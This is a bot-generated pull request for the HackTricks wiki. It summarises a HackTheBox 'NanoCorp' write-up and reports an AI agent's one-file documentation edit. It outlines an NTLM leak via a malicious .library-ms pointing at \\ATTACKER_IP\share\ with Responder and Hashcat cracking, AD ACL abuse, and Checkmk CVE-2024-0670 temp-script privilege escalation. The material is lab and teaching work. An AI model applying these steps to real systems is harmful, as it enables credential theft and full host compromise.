HTB NanoCorp CVE-2025-24071 NTLM Leak, AD ACL Abuse, Kerbero...

[carlospolop]

🤖 Automated Content Update

This PR was automatically generated by the HackTricks News Bot based on a technical blog post.

📝 Source Information

• Blog URL: https://0xdf.gitlab.io/2026/06/20/htb-nanocorp.html
• Blog Title: HTB NanoCorp: CVE-2025-24071 NTLM Leak, AD ACL Abuse, Kerberos WinRM, and Checkmk CVE-2024-0670 SYSTEM Privilege Escalation
• Suggested Section: Windows Hardening > NTLM > Places to steal NTLM creds; Active Directory Methodology > Abusing Active Directory ACLs/ACEs; Windows Local Privilege Escalation

🎯 Content Summary

NanoCorp is a Hard HackTheBox Windows Active Directory machine running nanocorp.htb on host DC01. The full attack path is: enumerate a Windows Server 2022 domain controller, discover a careers portal at hire.nanocorp.htb that accepts ZIP application uploads, exploit CVE-2025-24071 with a malicious .library-ms inside a ZIP to force outbound SMB authentication from the automated extraction job, capture and crack t...

🔧 Technical Details

Archive-triggered Net-NTLMv2 leak with .library-ms: If a Windows process automatically extracts or previews attacker-controlled archives, a malicious .library-ms file can embed a remote SMB URL such as \\ATTACKER_IP\share\ under <libraryDescription><searchConnectorDescriptionList><searchConnectorDescription><simpleLocation><url>...</url>. When Windows processes the library file, it resolves the UNC path and sends NTLM authentication to the attacker-controlled SMB listener. The attack pattern is: generate the XML, zip it, upload it into the target workflow, and run Responder with sudo uv run Responder.py -I tun0. The result is a Net-NTLMv2 challenge-response for the account processing the archive, which can be cracked offline with Hashcat mode 5600 if the password is weak.

AD ACL chaining from group membership control to password reset:🤖 Agent Actions

Done.

Updated file

• src/windows-hardening/windows-local-privilege-escalation/abusing-auto-updaters-and-ipc.md

What I added

• A new generalized section for Checkmk Agent / CVE-2024-0670 covering:
  • predictable temp .cmd execution from C:\Windows\Temp
  • spraying cmk_all_<PID>_1.cmd as read-only
  • ASCII batch payload requirement
  • mapping cached MSIs from C:\Windows\Installer
  • triggering repair with msiexec /fa
  • using qwinsta when repair behaves differently from non-interactive WinRM

Why only this

• The repo already had good coverage for:
  • ZIP .library-ms NTLM leaks
  • AD ACL group membership + ForceChangePassword
  • LDAP signing / channel binding posture
  • Kerberos / Protected Users / WinRM basics

So the main missing technique from the blog was the Checkmk MSI-repair temp-script privesc pattern.

References added

• 0xdf NanoCorp blog
• SEC Consult advisory
• Checkmk Werk #16361
• RunasCs

Validation

• Confirmed only one file was modified.
• Confirmed the file still has a single ## References section and ends with the banner include.
• mdbook build could not be run because mdbook is not installed in this environment.

---

This PR was automatically created by the HackTricks Feed Bot. Please review the changes carefully before merging.

[carlospolop]

🔗 Additional Context

Original Blog Post: https://0xdf.gitlab.io/2026/06/20/htb-nanocorp.html

Content Categories: Based on the analysis, this content was categorized under "Windows Hardening > NTLM > Places to steal NTLM creds; Active Directory Methodology > Abusing Active Directory ACLs/ACEs; Windows Local Privilege Escalation".

Repository Maintenance:

• MD Files Formatting: 977 files processed

Review Notes:

• This content was automatically processed and may require human review for accuracy
• Check that the placement within the repository structure is appropriate
• Verify that all technical details are correct and up-to-date
• All .md files have been checked for proper formatting (headers, includes, etc.)

Bot Version: HackTricks News Bot v1.0